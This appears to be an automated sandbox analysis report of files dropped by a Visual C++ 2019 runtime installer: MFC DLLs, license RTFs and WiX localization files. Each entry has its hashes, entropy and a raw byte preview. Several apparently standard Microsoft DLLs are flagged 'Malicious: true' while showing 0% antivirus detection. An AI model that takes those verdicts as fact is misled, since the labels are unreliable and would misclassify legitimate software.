Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!.................................................................s....@.......................................... ...................A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS.....}.L...0...f....d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140FRA.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140ita.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	74224
Entropy (8bit):	4.770796960519436
Encrypted:	false
SSDEEP:	768:3QE6XaCyqbK15MsOwgDGxNIlW3jSCQQQjeqS1hDDg1UWTVfW5f+rWGg:3Qass5MsOwgSxNIlW3GoiTIF+yn
MD5:	B9C956ED374FFCDBA4C08C3720D1DB53
SHA1:	380CB5C40863E19D690177278C442EF2D10EFA01
SHA-256:	3C9809576B7811C9F2167AE45722C54C73926E133C5BC6B688A6C1846E9EB295
SHA-512:	4BF3FF88AC69131F6C6C23D2B492D7EEB5315259B9465F0316910B7E48FA94D16BC81D1395FE63E01C1B2E527EA8AB1B09561866FCF9EA40BE96E646F3E083A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!......................................................................@.......................................... ...................A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDSk.8.#pJ..`\|........d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140ITA.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140jpn.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55792
Entropy (8bit):	5.94964592117223
Encrypted:	false
SSDEEP:	768:VpxanVn/TsfJxsr10/eu9RHreFKpWzziDpI2:Vpcnp/TsguntoXyS2
MD5:	8CDEEEB4F6DC317140C9725D26EA4894
SHA1:	154C83C29AE78C37D24F181D30F0B677E5FA8CA4
SHA-256:	C85FAD3BE1ADB9007045FFB7226F340AA5E14FB35D44DD0177641BD410C9FEA8
SHA-512:	8B3F9CC4CF2C7118276CD8BF8605F6FA2F83A8D479873BABF98DF6C46E27C86A144B289D97D3026C1B2B2384C5938B6C05E78B33AFA1A485D5866AEA083ECB21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!................................................................9+....@.......................................... ...................A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS.y@b$..@.>.8Z.......d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140JPN.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1.......rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140kor.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54768
Entropy (8bit):	6.1159324346768695
Encrypted:	false
SSDEEP:	768:fjVQO54LQTNdtUaHqNA3B2I7CvqXWfQNOWho:fjZ51TNdXqNAx2I7CvqmKOWho
MD5:	628CE133C7CDE15B08CC4C07646E7E2E
SHA1:	C6623E5E01DD83C89F96D540BD3D696C324533D2
SHA-256:	854EFA87200BDD5F2FB3B6E65CC43DFC8109A84887201093BAE5EA848271F639
SHA-512:	D79CFAA24A9556702794053CBBDD2B3E9468CB98D2991999ACB344E1ADAF19D7D1DCC204C83DC255E84B362DDCC31CE0B1617374BAC1C3CFB2911169DE802014
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!.................................................................~....@.......................................... ...................A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDS.x).6JwK.>H..$.o....d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140KOR.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1..@~...rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140rus.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	72176
Entropy (8bit):	5.322279857085589
Encrypted:	false
SSDEEP:	768:rAv/gFXOv00iqNWTMHVhtZgFckD9uAWqMB:K6XOv0EhTW+q+
MD5:	76A39F21CC452E2A7040A78792318982
SHA1:	4EB98EAD87D9DAEB3E2D96127FFBE3727C3E2264
SHA-256:	696DDA39E8DF5BE1006E937BECE2DA07441E8C2BD79760C739922B557A7B9385
SHA-512:	9FA307E5B3FD510619298577E7FD3E036D632B11861A04FB739E4D1443F1EC530EE1E9C9018900A164162074873C50C676EB1477EFB31F3E215C779F48096B00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<.M.R.M.R.M.R.F...L.R.F.P.L.R.RichM.R.................PE..L....V.^.........."!......................................................................@.......................................... ...................A..............8............................................................................text...............................@..@.rsrc........ ......................@..@.....V.^........Y...8...8........V.^........T...........RSDSnS...^9@.4.TQ..X....d:\agent\_work\1\s\\binaries\x86ret\bin\i386\\MFC140RUS.i386.pdb............8....rdata..8........rdata$zzzdbg.... ..p....rsrc$01....p1..H....rsrc$02....................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfc140u.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5082912
Entropy (8bit):	6.8680590475042465
Encrypted:	false
SSDEEP:	98304:pwTgRb/8LXPwCVSf9qGeFgHt23653x0qfSbNa/S306FLOAkGkzdnEVomFHKnPZC:6cR87wFFqG236L0XNa/S306FLOyomFHT
MD5:	109E1488C848F17E370F3973EFDE2C38
SHA1:	7F2FEB94CF7FD1378DF4963316C7941067E7EDC0
SHA-256:	0CE7B07B16BA59AAE714495043D1CC8385691125F977B34227DBE826DA6D1EEF
SHA-512:	6C66CA88306106E07432D05AE60A0278D6619E57B1B1EAC5C1AD4B02F3DD13EA8F68FE986322877FA975077C879629E0248239C00654420353772E8287583E23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........;%.sUv.sUv.sUv..v.sUv..v.sUv..v.sUv...v.sUv..Tw.sUv..Qw.sUv..Vw.sUv..Pw.sUv..v.sUv.sTvVpUv..\w9rUv..Uw.sUv...v.sUv..Ww.sUvRich.sUv........................PE..L....V.^.........."!......2..h.......V......../...............................M.....m.N...@A............................L.....3......`4..............NM. A....J.(.....2.8............................a..@.............3.....@.2......................text...t.2.......2................. ..`.data...8.....3.......2.............@....idata..DS....3..T....3.............@..@.didat.......P4.......4.............@....rsrc........`4...... 4.............@..@.reloc..(.....J.......I.............@..B................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfcm140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82720
Entropy (8bit):	6.481840055375367
Encrypted:	false
SSDEEP:	768:7xg82UCqlWXqCVz79dzv3sG2wlv13BVO5ncylfhcsZGolyQw3n/20c6dhVbuwSy1:J2Slq7vzvvTyphcsZGBpcGhQwSwUJ0
MD5:	F46353456429BF7768968B6285D7C2FB
SHA1:	5A6A6D4DB4BBD32CD141C3CD3D4F1996F1D27084
SHA-256:	D7FA4DFD8681B10EBF04CB5C72D0F3A20EAF9C4D287CC05C973561EC8DC6A019
SHA-512:	92C1F4C4AE572DBA8409FBC51F1ACC7FE5C347AFBD0A8B4EABDD339C4F4EF91698B7487E0F4708B89FAE8D2D436644026B89EC53F16F128DA9D773BB5AFE23C2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.L............K.M......E......x.......x.......x.......o.....K.V.........X....x.......x.......xF......x......Rich............................PE..L....V.^.........."!.....@...........N.......P...............................0......@.....@.........................0................................... A... ..L...hU..8............................T..@............P..,............R..H............text...)?.......@.................. ..`.rdata..^....P.......D..............@..@.data...............................@....rsrc...............................@..@.reloc..L.... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\mfcm140u.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	82720
Entropy (8bit):	6.4817802924170635
Encrypted:	false
SSDEEP:	1536:V8alW6KV4ueuAUnPcsZGVxIb+OvE1R4Wod:K6KpQUnPcsKIbHv+i
MD5:	A67DD2E47CAC448F5E0995FD8634FD4B
SHA1:	879F96580C33618EB4D4349DE3215A87BA132A56
SHA-256:	F371D0868A9BAD5B012AC25BDC55FBF41D7F9535ECDE1A37CB23F2732F5ED303
SHA-512:	912238A4299D50481EF3C48A0E7DBD799B29880131A9667AACD252E3BACE8CDD38F0EAA2EB2C6EE7380B8146B105F94E54F43134AFA841F70176C5F4F318D909
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.L............K.M......E......x.......x.......x.......o.....K.V.........X....x.......x.......xF......x......Rich............................PE..L....V.^.........."!.....@...........N.......P...............................0............@.........................0................................... A... ..L...hU..8............................T..@............P..,............R..H............text...)?.......@.................. ..`.rdata..^....P.......D..............@..@.data...............................@....rsrc...............................@..@.reloc..L.... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\vcamp140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	362272
Entropy (8bit):	6.480079655173682
Encrypted:	false
SSDEEP:	6144:TNdn9nbqWFEijveDAHlreqc7Bd0o+Sb9mut1EFnceq0CR0y5M+:j9uAeMBMBio+Sb9mut1EF1qi+
MD5:	766A806CF675EBFC1BCD8766D446692A
SHA1:	71A60564596341323B8544C46A63164974570216
SHA-256:	F59EEFB0DAF0CDD646C5B522BC14B13BCEA57A1ECD567E7A0B930AA5EAA2EC2F
SHA-512:	86B06DED1DBF3399ABEAB86C36268AD061CC19AFEF4F694EFE7F5584959F7551E803361A456EEDC2596440617EF28A7BAA6E34CFA6ABB3EC94D8E54D59FD9F01
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./...AN..AN..AN...N..AN..@O..AN..DO..AN..EO..AN..BO..AN...N..AN..@N2.AN..HO..AN..AO..AN...N..AN...N..AN..CO..ANRich..AN........................PE..L....V.^.........."!................@3.......................................p......C.....@A........................@s..47......@.......8$...........F.. A...0...>...g..8....................h.......h..@...............\|............................text...t........................... ..`.data....*.......(..................@....idata..............................@..@.rsrc...8$.......&..................@..@.reloc...>...0...@..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\vcomp140.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	141600
Entropy (8bit):	6.730918695182974
Encrypted:	false
SSDEEP:	3072:Dx2TmVYqVACERsarapgaqKSVoSkOuRoJm4t4/lAcXNt:FdbPFqjoPOuRou/lA2f
MD5:	072DA195F3C547B1584813E02E245CD8
SHA1:	EDA3A7CD19D4BB362BE37EC06290C1309962D4D4
SHA-256:	DBCB040304AC8A81E149840DEB816E1C4E5BC20487766541AA8C7C5C0629C804
SHA-512:	37BF63D59DF173D5152253CE2A4F5A2BB7DC2BF9F63BF7C379ED5BB3C9989BB782E6A836E8C6D7EBF2F927092E098FAA747F31AC4D6296194AEBCCC4EA8F68CE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uI...'..'..'..r$..'..r"...'..r#..'.{"..'.{#..'.{$..'......'..&...'.{...'.{'..'.{...'.{%..'.Rich..'.................PE..L...\|V.^.........."!.........>............................................... ............@................................`...<....................... A......d....b..8............................b..@...............\............................text............................... ..`.data...D...........................@....idata..,...........................@..@.rsrc...............................@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1028\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	18127
Entropy (8bit):	4.036737741619669
Encrypted:	false
SSDEEP:	192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
MD5:	B7F65A3A169484D21FA075CCA79083ED
SHA1:	5DBFA18928529A798FF84C14FD333CB08B3377C0
SHA-256:	32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
SHA-512:	EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1028\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2980
Entropy (8bit):	6.163758160900388
Encrypted:	false
SSDEEP:	48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
MD5:	472ABBEDCBAD24DBA5B5F5E8D02C340F
SHA1:	974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
SHA-256:	8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
SHA-512:	676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ................. ......................../passive \| /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1029\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13053
Entropy (8bit):	5.125552901367032
Encrypted:	false
SSDEEP:	192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
MD5:	B408556A89FCE3B47CD61302ECA64AC9
SHA1:	AAC1CDAF085162EFF5EAABF562452C93B73370CB
SHA-256:	21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
SHA-512:	BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1029\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3333
Entropy (8bit):	5.370651462060085
Encrypted:	false
SSDEEP:	48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
MD5:	16343005D29EC431891B02F048C7F581
SHA1:	85A14C40C482D9351271F6119D272D19407C3CE9
SHA-256:	07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
SHA-512:	FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive \| /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1031\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11936
Entropy (8bit):	5.194264396634094
Encrypted:	false
SSDEEP:	192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
MD5:	C2CFA4CE43DFF1FCD200EDD2B1212F0A
SHA1:	E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
SHA-256:	F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
SHA-512:	6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1031\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3379
Entropy (8bit):	5.094097800535488
Encrypted:	false
SSDEEP:	48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
MD5:	561F3F32DB2453647D1992D4D932E872
SHA1:	109548642FB7C5CC0159BEDDBCF7752B12B264C0
SHA-256:	8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
SHA-512:	CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive \| /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1036\license.rtf

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11593
Entropy (8bit):	5.106817099949188
Encrypted:	false
SSDEEP:	192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
MD5:	F0FF747B85B1088A317399B0E11D2101
SHA1:	F13902A39CEAE703A4713AC883D55CFEE5F1876C
SHA-256:	4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
SHA-512:	AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s

C:\Windows\Temp\{45D7D3A0-7450-4B40-B363-2D60ABFF476B}\.ba\1036\thm.wxl

Download File

Process:	C:\Windows\Temp\{F08C1FEB-1687-4A8B-928E-3F1E349DFB80}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3366
Entropy (8bit):	5.0912204406356905
Encrypted:	false
SSDEEP:	48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
MD5:	7B46AE8698459830A0F9116BC27DE7DF
SHA1:	D9BB14D483B88996A591392AE03E245CAE19C6C3
SHA-256:	704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
SHA-512:	FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
Malicious:	false
